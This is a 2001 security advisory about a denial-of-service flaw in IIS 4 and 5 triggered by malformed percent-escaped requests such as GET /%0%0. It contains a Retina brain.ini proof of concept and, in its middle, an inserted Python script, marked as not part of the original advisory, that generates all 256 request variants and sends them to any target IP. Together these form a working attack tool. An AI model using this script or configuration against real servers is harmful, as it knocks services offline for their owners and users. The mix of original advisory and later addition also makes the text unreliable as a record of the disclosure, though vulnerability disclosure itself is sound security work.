Date: Sat, 13 Jan 2001 11:53:17 -0500
From: NtWaK0 <[email protected]>
To: [email protected]
Subject: DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
NtWaK0, SecurHack. Labs
Security Advisory 1-13-2001
DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
oooooooooooooooooo
Vulnerable Systems
oooooooooooooooooo
IIS 4 and IIS 5 even if fully patched.
oooooooo
Synopsis
oooooooo
While playing with Miner in Retina I sent GET /%0%0 HTTP/1.0 to one of my
IIS 4 and IIS 5 servers. I noticed that Retina was taking a lot of time
to jump to the next defined variable in the brain.ini, which should be
GET /%0%1 and so on.
ooooooooooooo
Retina Result
ooooooooooooo
Command: GET /%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060

Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060

Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Pinging the box while running Retina, even from a different subnet, it
won't answer. You can connect to the web server, but you have to wait
forever for the page to load. I have tried that on IIS 4 and IIS 5 with
the same result.
oooooooooooooooo
Proof-Of-Concept
oooooooooooooooo
1- Get Retina From eeye.com
2- Install it
3- Edit the file brain.ini, located at
C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini <default
4- Put this in your brain.ini file
[General]
Title=HTTP Miner
[Commands]
1=GET /%%cgi-bin%%%%passwordfile%%%%passwordfile%% HTTP/1.0
[Variables]
cgi-bin=,
passwordfile=%0,%1,%2,%3,%4,%5,%6,%7,%8,%9,%a,%b,%c,%d,%e,%f,
5- Run Retina, choose Miner, type in the target IP and click GO :)
That will start sending GET /%0%0 HTTP/1.0, GET /%0%1 HTTP/1.0, etc.
To see the result, open up your browser and point it at the IP you are
mining: you will notice that you can just connect, and your LAN (in my
case cable) is almost flooded. Ping the IP you are mining and you will
get a ping timeout. Even if you try to connect to that IP from a totally
different network you won't be able to view the page, or it will take
forever to load.
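The same request sequence without Retina, as an added example that is not part of this advisory and not Retina's own code. It expands a brain.ini-style command template into the request lines the advisory says Miner sends (GET /%0%0 HTTP/1.0, GET /%0%1 HTTP/1.0, and so on), shows what is odd about each path (every '%' in /%0%0 starts a truncated percent-escape, since a complete escape needs two hex digits), and can replay the lines against a host with a socket timeout so a hung server is reported as a timeout instead of a stuck scanner. The Retina output above reports Winsock error 10060, which is WSAETIMEDOUT, so a "timeout" result from this script is the same observation. The expansion rule (each %%name%% placeholder takes one value from a comma-separated list and all combinations are tried) is an assumption about the brain.ini format, not documented Retina behaviour.

```python
"""Replay of the Retina 'HTTP Miner' sequence described in the advisory.

Added example: not code from the advisory and not part of Retina.  The
brain.ini expansion rule below (every %%name%% placeholder takes one value
from a comma-separated list; all combinations are tried) is an assumption.
"""
import itertools
import re
import socket
import sys
import time

# The [Commands]/[Variables] entries from the advisory's brain.ini.  The
# variable is named to match the placeholder used in the command line.
COMMAND = "GET /%%cgi-bin%%%%passwordfile%%%%passwordfile%% HTTP/1.0"
VARIABLES = {
    "cgi-bin": ",",
    "passwordfile": "%0,%1,%2,%3,%4,%5,%6,%7,%8,%9,%a,%b,%c,%d,%e,%f,",
}

_PLACEHOLDER = re.compile(r"%%([^%]+)%%")
# A '%' that is not followed by two hex digits starts a truncated escape.
_TRUNCATED = re.compile(r"%(?![0-9A-Fa-f]{2})")


def _values(spec):
    """Split a brain.ini value list; a trailing comma adds no extra value."""
    values = spec.split(",")
    if len(values) > 1 and values[-1] == "":
        values.pop()
    return values


def expand_template(command, variables):
    """Return every request line the template produces, in order.

    Repeated placeholders expand independently, so the two %%passwordfile%%
    slots give 16 x 16 = 256 lines, starting with 'GET /%0%0 HTTP/1.0'.
    """
    names = _PLACEHOLDER.findall(command)
    lines = []
    for combo in itertools.product(*(_values(variables[n]) for n in names)):
        chosen = iter(combo)
        lines.append(_PLACEHOLDER.sub(lambda _m: next(chosen), command))
    return lines


def request_path(line):
    """'GET /%0%0 HTTP/1.0' -> '/%0%0'."""
    return line.split()[1]


def truncated_escapes(path):
    """Return each '%' (with the character after it) that is not a full %XX.

    '/%0%0' yields ['%0', '%0']: '%0' is followed by another '%', and the
    second '%0' is cut off by the end of the path.  A front end that rejects
    such paths before URL-decoding never forwards this sequence.
    """
    return [path[m.start():m.start() + 2] for m in _TRUNCATED.finditer(path)]


def replay(host, lines, port=80, timeout=5.0, stop_on_timeout=True):
    """Send each line as a bare HTTP/1.0 request and time the answer.

    A 'timeout' result corresponds to Retina's 'Connection to server lost,
    Error 10060' (Winsock WSAETIMEDOUT).
    """
    results = []
    for line in lines:
        started = time.monotonic()
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall((line + "\r\n\r\n").encode("ascii"))
                s.recv(4096)           # first bytes of the reply, if any
            status = "ok"
        except socket.timeout:
            status = "timeout"
        except OSError as exc:         # reset, refused, unreachable
            status = "error: %s" % exc
        results.append((line, status, round(time.monotonic() - started, 2)))
        print("%-32s %-10s %6.2fs" % results[-1])
        if stop_on_timeout and status == "timeout":
            break
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: %s <target-ip>  (only against hosts you may test)" % sys.argv[0])
        sys.exit(2)
    replay(sys.argv[1], expand_template(COMMAND, VARIABLES))
```

Run it with the target IP as the only argument, and only against a server you are authorised to test; it stops at the first timeout so you can confirm the hang with a ping from another host, as the advisory does, without continuing to flood the link.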
oooooooooo
Resolution
oooooooooo
No idea :(
ooooooo
Credits
ooooooo
The discovery and documentation of this vulnerability was conducted by
NtWaK0.
For more information, see DALnet channel #security.
______________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and I'm
not even too sure about that one." -- Dennis Hughes, FBI.
____________________________________________________________.__________
Live Well Do Good |
Accept no limitations \(|)/
/`\ NtWaK0